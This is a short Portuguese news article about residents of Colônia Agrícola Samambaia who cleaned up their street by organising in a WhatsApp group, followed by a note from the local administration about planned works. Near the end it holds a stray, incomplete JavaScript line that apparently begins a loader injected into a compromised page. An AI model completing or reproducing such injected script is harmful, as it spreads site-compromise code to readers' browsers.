Mão na massa

whatsapp-image-2016-10-24-at-11-16-44
Foto: Jornal Satélite

Cansados de esperar ação do governo, os moradores da Colônia Agrícola Samambaia decidiram se unir para manter a Rua dos Coqueiros, na Chácara 122, limpa e preservada. Os vizinhos criaram um grupo de WhatsApp e, a partir de então, começaram a mobilizar outros moradores da rua para tornar o espaço agradável “com um ar de cidade do interior”.

“Criamos uma noção de pertencimento no nosso ambiente. Hoje, nossa rua está limpa, aproximamos mais os moradores, mesmo alguns tendo certa resistência às melhorias, e valorizamos o ambiente”, disse Wilon Wander Lopes, de 71 anos. A grandeza da iniciativa não custou caro: R$ 35.

A assessoria de comunicação da Administração de Vicente Pires informou que vários setores são contemplados com obras de infraestrutura, como operação tapa-buracos, desobstrução de bocas de lobo e limpeza de áreas públicas com o recolhimento de entulho e lixo. “Quanto a referida localidade já há um cronograma para que a região receba melhorias como nivelamento de ruas e limpeza em parceria com a Novacap”, disse em nota.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário